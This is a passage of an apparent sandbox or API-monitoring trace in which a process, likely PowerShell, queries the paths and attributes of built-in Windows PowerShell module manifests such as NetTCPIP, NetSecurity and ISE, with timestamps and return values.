ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x68d)) returned 1 [0226.282] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1", lpFilePart=0x0) returned 0x65 [0226.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.283] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\EventTracingManagement\\EventTracingManagement.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\eventtracingmanagement\\eventtracingmanagement.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x137071a4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x137071a4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x137071a4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4dc)) returned 1 [0226.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1", lpFilePart=0x0) returned 0x53 [0226.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.283] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\International\\International.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\international\\international.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x24365954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x24365954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x24365954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x397)) returned 1 [0226.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1", lpFilePart=0x0) returned 0x43 [0226.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.283] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1679af9e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1679af9e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1679af9e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a3)) returned 1 [0226.283] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1", lpFilePart=0x0) returned 0x3f [0226.283] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.283] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psm1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3474)) returned 1 [0226.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1", lpFilePart=0x0) returned 0x3f [0226.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.284] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\ISE\\ISE.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\ise\\ise.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f066aa8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f066aa8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f066aa8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1da)) returned 1 [0226.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1", lpFilePart=0x0) returned 0x3f [0226.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.284] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Kds\\Kds.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\kds\\kds.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17d82902, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x17d82902, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x17d82902, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x209)) returned 1 [0226.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1", lpFilePart=0x0) returned 0x6d [0226.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.284] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.WSMan.Management\\Microsoft.WSMan.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.wsman.management\\microsoft.wsman.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f3159a2, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f3159a2, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f3159a2, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2ba)) returned 1 [0226.284] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1", lpFilePart=0x0) returned 0x47 [0226.284] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MMAgent\\MMAgent.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\mmagent\\mmagent.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f14b8c7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x4f14b8c7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x4f14b8c7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24e)) returned 1 [0226.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1", lpFilePart=0x0) returned 0x43 [0226.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\MsDtc.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\msdtc.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1a48d09b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1a48d09b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1a48d09b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1006)) returned 1 [0226.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1", lpFilePart=0x0) returned 0x4d [0226.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetAdapter\\NetAdapter.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netadapter\\netadapter.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104a9778, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104a9778, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104a9778, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14aa)) returned 1 [0226.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1", lpFilePart=0x0) returned 0x53 [0226.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.285] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetConnection\\NetConnection.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netconnection\\netconnection.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9c8bf1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xf9c8bf1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xf9c8bf1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x26b)) returned 1 [0226.285] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1", lpFilePart=0x0) returned 0x63 [0226.285] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\NetEventPacketCapture.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\neteventpacketcapture.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103eabb8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103eabb8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103eabb8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x875)) returned 1 [0226.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1", lpFilePart=0x0) returned 0x47 [0226.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetLbfo\\NetLbfo.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netlbfo\\netlbfo.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11022c65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11022c65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x432)) returned 1 [0226.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1", lpFilePart=0x0) returned 0x45 [0226.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetNat\\NetNat.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netnat\\netnat.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x45c)) returned 1 [0226.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1", lpFilePart=0x0) returned 0x45 [0226.286] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetQos\\NetQos.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netqos\\netqos.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe453998, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe453998, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe453998, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x289)) returned 1 [0226.286] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1", lpFilePart=0x0) returned 0x4f [0226.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.287] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSecurity\\NetSecurity.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netsecurity\\netsecurity.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1039e70b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1039e70b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1039e70b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13f1)) returned 1 [0226.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1", lpFilePart=0x0) returned 0x53 [0226.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.287] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetSwitchTeam\\NetSwitchTeam.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\netswitchteam\\netswitchteam.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11048ec0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x11048ec0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x11048ec0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420)) returned 1 [0226.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1", lpFilePart=0x0) returned 0x49 [0226.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.287] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP\\NetTCPIP.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\nettcpip\\nettcpip.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb8a7e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfbb8a7e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfbb8a7e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x862)) returned 1 [0226.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1", lpFilePart=0x0) returned 0x6b [0226.287] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.287] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkConnectivityStatus\\NetworkConnectivityStatus.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkconnectivitystatus\\networkconnectivitystatus.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2f6)) returned 1 [0226.287] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1", lpFilePart=0x0) returned 0x61 [0226.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkSwitchManager\\NetworkSwitchManager.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networkswitchmanager\\networkswitchmanager.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x87e)) returned 1 [0226.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1", lpFilePart=0x0) returned 0x5b [0226.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetworkTransition\\NetworkTransition.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\networktransition\\networktransition.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa6d)) returned 1 [0226.288] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8de30) returned 1 [0226.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", nBufferLength=0x105, lpBuffer=0x653ef8da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1", lpFilePart=0x0) returned 0x4d [0226.288] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8de70) returned 1 [0226.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PcsvDevice\\PcsvDevice.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\pcsvdevice\\pcsvdevice.psd1"), fInfoLevelId=0x0, lpFileInformation=0x653ef8df50 | out: lpFileInformation=0x653ef8df50*(dwFileAttributes=0x20, 